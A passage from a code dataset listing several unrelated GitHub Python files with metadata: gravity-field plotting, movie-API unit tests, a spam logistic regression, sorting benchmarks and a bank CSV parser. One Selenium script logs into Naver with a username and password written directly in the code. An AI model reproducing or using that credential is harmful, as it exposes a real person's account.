0.0 for no filter\n\n# region and step size of grid to calculate EWH\nlam = np.arange(-180.0, 180.0, 1.0)\nlat = np.arange(1.0, 180.0, 1.0)\nrlam=lam*np.pi/180\nrlat = lat*np.pi/180\n\n# Gravity field\n# Files can be downloaded from http://ifg.tugraz.at/ITSG-Grace2016\n# this example uses unconstrained monthly solutions of degree 120\nfile1='data/ITSG-Grace2016_n120_2002-05.gfc'\nfile2='data/ITSG-Grace2016_n120_2017-05.gfc'\n\n# read gravity field coefficients (degree, order, cnm, snm)\ncoeffi1 = np.loadtxt(file1, usecols=(1,2,3,4), skiprows= 19)\ncoeffi2 = np.loadtxt(file2, usecols=(1,2,3,4), skiprows= 19)\n# filter coefficients\nif filterradius > 0.0:\n fc=pgfl.GaussFilterCoeff(R, filterradius, deg_max)\n filter_coeff=np.outer(fc,np.ones((deg_max+1,1)))\nelse:\n filter_coeff=np.ones((deg_max+1,1))\n \n# sort coefficients into triangular matrix\ncnm1, snm1 = pgfl.coeffisort(coeffi1, deg_max)\ncnm2, snm2 = pgfl.coeffisort(coeffi2, deg_max)\n# coefficient difference\ndc=(cnm2-cnm1)*filter_coeff\nds=(snm2-snm1)*filter_coeff\n# Love numbers\nkn = pgfl.LoveNumbers(deg_max)\n# Legendre functions\nlf = pgfl.LegendreFunctions(deg_max)\n\nif __name__ == '__main__':\n # calculations\n w=ewh_calc()\n # Plot of result\n fig=plt.figure(figsize=[15,8])\n ax = plt.subplot(projection=ccrs.PlateCarree())\n imgextend = [-180, 180, -90, 90]\n t=ax.imshow(w,origin='upper',extent=imgextend, transform=ccrs.PlateCarree(),\n cmap='RdBu') \n ax.coastlines('110m') # 50m is also available\n lonLabels = np.arange(-180, 181, 60)\n latLabels = np.arange(-90, 91, 30)\n gl=ax.gridlines(draw_labels=True,color='k',linewidth=1.5)\n gl.xlocator = mticker.FixedLocator(lonLabels)\n gl.ylocator = mticker.FixedLocator(latLabels)\n gl.xformatter = LongitudeFormatter()\n gl.yformatter = LatitudeFormatter()\n \n cbar=plt.colorbar(t)\n cbar.set_label('EWH / m', rotation=90)\n plt.show()\n \n\n", "repo_name": "mikesierra7/34c3_EWH_MWE", "sub_path": "example.py", "file_name": "example.py", "file_ext": "py", "file_size_in_byte": 4158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "multiprocessing.Pool", "line_number": 42, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 42, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs.waterheight", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.s_", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 75, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs.GaussFilterCoeff", "line_number": 78, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 78, "usage_type": "name"}, {"api_name": "numpy.outer", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 81, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs.coeffisort", "line_number": 84, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 84, "usage_type": "name"}, {"api_name": "pyfunc.plot_grav_field_libs.coeffisort", "line_number": 85, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 85, "usage_type": "name"}, {"api_name": "pyfunc.plot_grav_field_libs.LoveNumbers", "line_number": 90, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 90, "usage_type": "name"}, {"api_name": "pyfunc.plot_grav_field_libs.LegendreFunctions", "line_number": 92, "usage_type": "call"}, {"api_name": "pyfunc.plot_grav_field_libs", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 99, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 99, "usage_type": "name"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 101, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 101, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FixedLocator", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.ticker.FixedLocator", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 108, "usage_type": "name"}, {"api_name": "cartopy.mpl.gridliner.LongitudeFormatter", "line_number": 109, "usage_type": "call"}, {"api_name": "cartopy.mpl.gridliner.LatitudeFormatter", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}]} +{"seq_id": "36965319549", "text": "import copy\nimport json\nimport pytest\n\nfrom api.movies import handle, UnsupportedMethod\n\n\ndef test_unsupported_method():\n event = {\n \"requestContext\": {\n \"http\": {\n \"method\": \"AA\"\n }\n },\n \"queryStringParameters\": {\n \"mal_id\": \"123\"\n }\n }\n\n with pytest.raises(UnsupportedMethod):\n handle(event, None)\n\n\nclass TestPost:\n event = {\n \"requestContext\": {\n \"http\": {\n \"method\": \"POST\"\n }\n },\n \"body\": '{\"api_id\": \"123\", \"api_name\": \"tmdb\"}'\n }\n\n def test_success(self, mocked_movies_db):\n mocked_movies_db.table.query.side_effect = mocked_movies_db.NotFoundError\n\n res = handle(self.event, None)\n\n exp = {\n \"body\": json.dumps({\"id\": \"e6d4fa11-1ad7-5137-a962-9554c8766356\"}),\n \"statusCode\": 200\n }\n assert res == exp\n\n def test_already_exist(self, mocked_movies_db):\n mocked_movies_db.table.query.return_value = {\n \"Items\": [\n {\n \"tmdb_id\": \"123\"\n }\n ]\n }\n\n res = handle(self.event, None)\n\n exp = {\n \"body\": json.dumps({\"id\": \"e6d4fa11-1ad7-5137-a962-9554c8766356\"}),\n \"statusCode\": 200\n }\n assert res == exp\n\n def test_no_body(self, mocked_movies_db):\n mocked_movies_db.table.query.return_value = {\n \"Items\": [\n {\n \"tmdb_id\": \"123\"\n }\n ]\n }\n event = copy.deepcopy(self.event)\n del event[\"body\"]\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": \"Invalid post body\"\n }\n assert res == exp\n\n def test_invalid_body(self, mocked_movies_db):\n mocked_movies_db.table.query.return_value = {\n \"Items\": [\n {\n \"mal_id\": 123\n }\n ]\n }\n event = copy.deepcopy(self.event)\n event[\"body\"] = '{\"aa\": \"bb\"}'\n\n res = handle(event, None)\n\n exp = {\n 'body': '{\"message\": \"Invalid post schema\", '\n '\"error\": \"Additional properties are not allowed (\\'aa\\' was unexpected)\"}',\n 'statusCode': 400\n }\n assert res == exp\n\n\nclass TestGet:\n event = {\n \"requestContext\": {\n \"http\": {\n \"method\": \"GET\"\n }\n },\n \"queryStringParameters\": {\n \"api_id\": \"123\",\n \"api_name\": \"tmdb\",\n }\n }\n\n def test_success(self, mocked_movies_db):\n exp_res = {\n \"id\": \"123\"\n }\n mocked_movies_db.table.query.return_value = {\n \"Items\": [\n exp_res\n ]\n }\n\n res = handle(self.event, None)\n\n exp = {\n \"statusCode\": 200,\n \"body\": json.dumps(exp_res)\n }\n assert res == exp\n\n def test_not_found(self, mocked_movies_db):\n mocked_movies_db.table.query.side_effect = mocked_movies_db.NotFoundError\n\n res = handle(self.event, None)\n\n exp = {\n \"statusCode\": 404,\n }\n assert res == exp\n\n def test_empty_query_params(self):\n event = copy.deepcopy(self.event)\n event[\"queryStringParameters\"] = {}\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"error\": \"Please specify query parameters\"})\n }\n assert res == exp\n\n def test_invalid_query_params(self):\n event = copy.deepcopy(self.event)\n event[\"queryStringParameters\"] = {\n \"abc\": \"123\"\n }\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"error\": \"Missing api_id query parameter\"})\n }\n assert res == exp\n\n def test_missing_api_name(self):\n event = copy.deepcopy(self.event)\n del event[\"queryStringParameters\"][\"api_name\"]\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"error\": \"Missing api_name query parameter\"})\n }\n assert res == exp\n\n def test_invalid_api_name(self):\n event = copy.deepcopy(self.event)\n event[\"queryStringParameters\"][\"api_name\"] = \"INVALID\"\n\n res = handle(event, None)\n\n exp = {\n \"statusCode\": 400,\n \"body\": json.dumps({\"error\": \"Unsupported query param\"})\n }\n assert res == exp\n", "repo_name": "projectmovio/movie-service", "sub_path": "test/unittest/test_movies.py", "file_name": "test_movies.py", "file_ext": "py", "file_size_in_byte": 4618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pytest.raises", "line_number": 20, "usage_type": "call"}, {"api_name": "api.movies.UnsupportedMethod", "line_number": 20, "usage_type": "argument"}, {"api_name": "api.movies.handle", "line_number": 21, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 54, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 70, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 73, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 89, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 92, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 125, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 129, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 136, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 144, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 147, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 151, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 156, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 161, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 165, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 170, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 173, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 177, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 182, "usage_type": "call"}, {"api_name": "api.movies.handle", "line_number": 185, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 189, "usage_type": "call"}]} +{"seq_id": "4329322169", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nimport math\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model.logistic import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt\n\ndef logist(z):\n ans = []\n for i in z:\n tem = []\n tem.append(1 / (1 + math.exp(-i[0])))\n ans.append(tem)\n return ans\n\n\ndef computeCost(X, Y, theta):\n sum = 0\n for i in range(len(Y)):\n h = 1 / (1 + math.exp(-np.dot(X.T[i], theta)))\n if h==0:\n if Y[i][0]==0:\n sum+=0\n else:\n sum-=999999\n elif h==1:\n if Y[i][0]==1:\n sum+=0\n else:\n sum-=999999\n else:sum += Y[i][0] * math.log(h) + (1 - Y[i][0]) * math.log(1 - h)\n return sum\n\n\ndef logistic_regression(X, Y, theta, rate=0.001, thredsome=-0.1, maxstep=10000):\n # update theta\n cost = computeCost(X, Y, theta)\n picturelist = []\n picturelist.append(cost)\n step = 0\n while costthredsome:\n # print(\"发散\")\n return theta, step, picturelist\n\n\nf = open('spambase.data')\ndf = pd.read_csv(f, header=None)\ndf = df.values.tolist()\nfeaturelist = []\nfor i in df:\n y = i[0].split()\n for j in range(len(y)):\n y[j] = float(y[j])\n featurelist.append(y)\n\nX = []\nY = []\n\nfor i in featurelist:\n tem = []\n tem.append(i[-1])\n Y.append(tem)\n X.append(i[0:-1])\n\nY = np.array(Y)\nX = np.array(X)\n\nstand = StandardScaler()\nX = stand.fit_transform(X)\nX = X.T\nX = np.insert(X, 0, [1], axis=0)\n# train_X=X[:,0:4000]\n# test_X=X[:,4000:]\ntrain_X, test_X, train_Y, test_Y = train_test_split(X.T, Y)\n\ntrain_X = train_X.T\ntest_X = test_X.T\nprint(train_X.shape)\nprint(test_X.shape)\nprint(train_Y.shape)\nprint(test_Y.shape)\n\ntheta = np.zeros([len(X), 1], dtype=float)\n# cur_theta_BGD, step, lost_BGD = logistic_regression(train_X, train_Y, theta)\n#\n# picturex_BGD=np.arange(len(lost_BGD))\n# ax = plt.subplot(111)\n# plt.plot(picturex_BGD,lost_BGD,color='blue')\n# plt.title(\" the trend of likely function in training\")\n# ax.set_xlabel(\"step\")\n# ax.set_ylabel(\"value\")\n# plt.savefig(\"./likely_function.png\")\n# plt.show()\n#\n# print(cur_theta_BGD)\n# predict_BGD = logist(np.dot(test_X.T, cur_theta_BGD))\n#\n# predict_Y = []\n# # 预测正确的邮件数\n# predict_spam = 0\n# predict_good = 0\n# # 测试集里的邮件数\n# test_good = 0\n# test_spam = 0\n#\n# for i in test_Y:\n# if i[0] == 1:\n# test_spam += 1\n# else:\n# test_good += 1\n#\n# for i in predict_BGD:\n# if i[0] >= 0.5:\n# predict_Y.append(1)\n# else:\n# predict_Y.append(0)\n#\n# for i in range(len(predict_Y)):\n# if predict_Y[i] == test_Y[i][0]:\n# if predict_Y[i] == 1:\n# predict_spam += 1\n# else:\n# predict_good += 1\n#\n# print(\"测试集中的正常邮件数为\", test_good, \"预测对的正常邮件数为\", predict_good)\n# print(\"测试集中的垃圾邮件数为\", test_spam, \"预测对的垃圾邮件为\", predict_spam)\n# print(\"总预测正确个数为\", (predict_spam + predict_good), \"总正确率为\", (predict_spam + predict_good) / len(predict_Y))\n", "repo_name": "BuleSky233/LogisticRegression", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.exp", "line_number": 15, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 23, "usage_type": "call"}, {"api_name": "math.log", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.insert", "line_number": 80, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "41491163844", "text": "import json\n\nwith open('input.txt') as f:\n d = json.load(f)\n\nstack = [d]\ncount = 0\n\nwhile(len(stack) > 0):\n el = stack.pop()\n if type(el) == dict:\n if \"red\" in el.values():\n continue\n [stack.append(el[x]) for x in el]\n elif type(el) == list:\n [stack.append(x) for x in el]\n elif type(el) == int:\n count += el\n \nprint(count)", "repo_name": "seyys/advent-of-code", "sub_path": "2015/day12/part2.py", "file_name": "part2.py", "file_ext": "py", "file_size_in_byte": 386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "74965532964", "text": "from selenium import webdriver\nimport time\n\n# Chrome의 경우 | 아까 받은 chromedriver의 위치를 지정해준다.\ndriver = webdriver.Chrome('D:/python/crawling/chromedriver.exe')\n# 크롬을 통해 네이버 로그인 화면 접속\ndriver.get('https://nid.naver.com/nidlogin.login')\n\ntime.sleep(1)\ndriver.find_element_by_name('id').send_keys('or_lln')\ntime.sleep(1)\ndriver.find_element_by_name('pw').send_keys('80dkgus14!')\n\n# xpath //*[@id=\"log.login\"]/fieldset/input\ndriver.find_element_by_xpath('//*[@id=\"log.login\"]').click()\n\n# from bs4 import BeautifulSoup as bs\n# driver.get('https://mail.naver.com/')\n# html = driver.page_source\n# soup = bs(html, \"html.parser\")\n# title_list = soup.find_all('strong','mail_title')\n#\n# for title in title_list:\n# print(title.get_text())", "repo_name": "dhflxhdxhd/crawling_with_python", "sub_path": "sns_crawling_prac/selenium_login.py", "file_name": "selenium_login.py", "file_ext": "py", "file_size_in_byte": 788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 5, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 5, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 9, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "73598472806", "text": "# 这是一个对元件放大缩小的函数,./tutle文件夹里的元件已经去背景随机缩小好了,这个只是上传着玩\nfrom rembg import remove\nfrom PIL import Image\nimport os\nimport random\nimport shutil\n\n\ndef get_folders(directory):\n folders = [] # 创建一个空列表来存放文件夹\n for entry in os.listdir(directory): # 遍历目录中的所有条目\n if os.path.isdir(os.path.join(directory, entry)): # 如果条目是文件夹\n folders.append(entry) # 将条目添加到列表中\n return folders # 返回列表\n\n\nout_path = r'' # 元件输出文件夹\npath = r\"\" # 元件输入文件夹\n\na = get_folders(path) # 打印F:/Python/PAMC目录下的所有文件夹\n\n# for dir in a:\n# b = os.listdir(path + dir)\n# for i in b:\n# c = os.listdir(path + dir + \"/\" + i)\n# for tutle in c:\n# input_path = path + dir + \"/\" + i + '/' + tutle # 输入图片的路径\n# output_path = path + dir + \"/\" + i + \"/\" + tutle # 输出图片的路径\n# im = Image.open(input_path) # 打开图片\n# width, height = im.size # 获取原始宽度和高度\n#\n# target_width = int(width * random.randint(18, 25) / 100) # 定义目标宽度\n# ratio = target_width / width # 计算宽高比\n# target_height = int(height * ratio) # 计算目标高度\n#\n# im = im.resize((target_width, target_height), Image.LANCZOS) # 将图片缩小到目标尺寸,使用LANCZOS滤波器\n# im.save(output_path) # 保存缩小后的图片\n# print(i + ' done!')\n\n\n# b = os.listdir(path)\n# for i in b:\n# input_path2 = os.path.join(path, i)\n# c = os.listdir(input_path2)\n# for tutle in c:\n# input_path = os.path.join(input_path2, tutle)\n# shutil.copy(input_path, out_path)\n\nb = os.listdir(path)\nfor tutle in b:\n input_path = path + tutle # 输入图片的路径\n output_path = path + tutle # 输出图片的路径\n im = Image.open(input_path) # 打开图片\n width, height = im.size # 获取原始宽度和高度\n\n target_width = int(width * random.randint(18, 25) / 100) # 定义目标宽度\n ratio = target_width / width # 计算宽高比\n target_height = int(height * ratio) # 计算目标高度\n\n im = im.resize((target_width, target_height), Image.LANCZOS) # 将图片缩小到目标尺寸,使用LANCZOS滤波器\n im.save(output_path) # 保存缩小后的图片\n", "repo_name": "zhuerding/smart_tree", "sub_path": "mods/word_creative.py", "file_name": "word_creative.py", "file_ext": "py", "file_size_in_byte": 2493, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 53, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 60, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 60, "usage_type": "name"}]} +{"seq_id": "28541961234", "text": "import random\nfrom timeit import repeat\n\nfrom matplotlib import pyplot as plt\n\n\ndef run_sorting_algorithm(algorithm, iterable):\n setup = f\"\"\"from sorting_algorithms import {algorithm}\"\"\"\n stmt = f\"{algorithm}.sort({iterable})\"\n times = repeat(stmt=stmt, setup=setup, repeat=3, number=10)\n\n\n return sum(times) / len(times)\n\n\ndef _print_table(columns, indexes, rows):\n columns = \"\\t\\t\".join(columns)\n print(f\"\\t{columns}\")\n for idx, row in zip(indexes, rows):\n row_str = \"\\t\".join(map(str, row))\n print(f\"{idx}\\t{row_str}\")\n\n\ndef _plot_performances(algorithms, sizes, times):\n plt.plot(sizes, times)\n plt.legend(algorithms)\n plt.title(\"Sorting Algorithms Complexity\")\n plt.show()\n\n\nif __name__ == '__main__':\n algorithms = [\n # \"selection_sort\",\n \"counting_sort\",\n \"merge_sort\",\n \"quicksort\",\n \"python_sort\"\n ]\n max_size = 1e2\n sizes = range(10, int(max_size), int((max_size - 10) // 10))\n performances = []\n\n for size in sizes:\n iterable = [\n random.randint(int(-1e3), int(1e3))\n for _ in range(int(size))\n ]\n size_avg_times = []\n for alg in algorithms:\n avg_time = run_sorting_algorithm(alg, iterable)\n size_avg_times.append(avg_time)\n performances.append(size_avg_times)\n\n _print_table(algorithms, sizes, performances)\n _plot_performances(algorithms, sizes, performances)", "repo_name": "Mendes11/Sorting-Algorithms", "sub_path": "compare.py", "file_name": "compare.py", "file_ext": "py", "file_size_in_byte": 1457, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "timeit.repeat", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "32786665392", "text": "\nimport os\nimport joblib\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom sklearn.base import BaseEstimator\nfrom sklearn.datasets import fetch_openml\n\n\nclass Never5Classifier(BaseEstimator):\n def fit(self, X, y=None):\n pass\n\n def predict(self, X):\n return np.zeros((len(X), 1), dtype=bool)\n\n\ndef dwldAndLoad(pth, dataset, version=1):\n datasetExists = os.path.exists(pth)\n if (not datasetExists):\n mnist = fetch_openml('mnist_784', version=version)\n joblib.dump(mnist, pth)\n else:\n mnist = joblib.load(pth)\n return mnist\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\")\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\")\n\n\ndef plot_roc_curve(fpr, tpr, label=None):\n plt.plot(fpr, tpr, linewidth=2, label=label)\n plt.plot([0, 1], [0, 1], 'k--')\n\n\ndef pklFitModel(pth, model, X_train, y_train, OVW=False):\n mdlExists = os.path.exists(pth)\n if (not mdlExists) or (OVW):\n fit = model.fit(X_train, y_train)\n joblib.dump(fit, pth)\n else:\n fit = joblib.load(pth)\n return fit\n\n\ndef pklEval(pth, model, fun, X_train, y_train, OVW=False, **kwargs):\n mdlExists = os.path.exists(pth)\n if (not mdlExists) or (OVW):\n dta = fun(model, X_train, y_train, **kwargs)\n joblib.dump(dta, pth)\n else:\n dta = joblib.load(pth)\n return dta\n\n\ndef plot_digit(data):\n image = data.reshape(28, 28)\n plt.imshow(image, cmap=mpl.cm.binary, interpolation=\"nearest\")\n plt.axis(\"off\")\n", "repo_name": "Chipdelmal/HandsOnML", "sub_path": "03_Classification/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 1618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.base.BaseEstimator", "line_number": 11, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sklearn.datasets.fetch_openml", "line_number": 22, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 23, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "joblib.dump", "line_number": 43, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "joblib.dump", "line_number": 53, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.cm", "line_number": 61, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}]} +{"seq_id": "36655089831", "text": "\n# coding: utf-8\n\nimport os\nimport inspect\nimport datetime\nfrom datetime import date, timedelta\nimport copy\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\nimport matplotlib.ticker as ticker\nimport matplotlib.dates as mdates\nfrom matplotlib.widgets import Button, SpanSelector, RadioButtons\nfrom matplotlib.dates import num2date, DayLocator\n\n\nclass Presenter():\n \n def __init__(self, model, view, files):\n self.model = model\n self.view = view\n self.files = files\n \n def showPlots(self):\n self.cleanedDf, self.wholeDf = self.model.parseFiles(self.files)\n self.view.showPlots(self.cleanedDf)\n \n def showDataframe(self):\n return self.wholeDf\n\n\nclass otpParser():\n \n def __init__(self):\n self.headers = ['accountNr', 'T/J', 'sum', 'currency', 'date', 'date2', 'balance', 'noIdea',\n 'noIdea2', 'comment', 'noIdea3', 'noIdea4', 'comment2']\n \n def parseFiles(self, files):\n dataFrames=[]\n \n for file in files:\n try:\n dataFrame = pd.read_csv(file, header=None)\n except :\n dataFrame = pd.read_csv(file, sep=';', header=None)\n dataFrames.append(dataFrame)\n for df in dataFrames:\n try:\n df.drop(df.columns[[13, 14]], axis=1, inplace=True)\n except:\n pass\n \n mergedFrame = pd.concat(dataFrames)\n mergedFrame.columns = self.headers \n mergedFrame = mergedFrame.reset_index(drop=True)\n mergedFrame = mergedFrame.sort_values(by='date')\n mergedFrame['comment'] = mergedFrame['comment'].replace(np.nan, '', regex=True)\n mergedFrame['comment'] = mergedFrame['comment'].apply((lambda x: ' '.join(x.split())))\n mergedFrame.loc[mergedFrame['comment']=='','comment'] = mergedFrame.loc[(mergedFrame[\"comment\"] == '') , \"comment2\"]\n cleanDf = mergedFrame.loc[:,['sum', 'date', 'comment','balance']]\n self.df = mergedFrame\n return cleanDf, mergedFrame\n\n def printDf(self):\n return self.df\n\n\nRED = (0.83921568627450982, 0.15294117647058825, 0.15686274509803921, 1.0)\nDARK_RED = (0.49803921568627452, 0.12156862745098039, 0.12156862745098039, 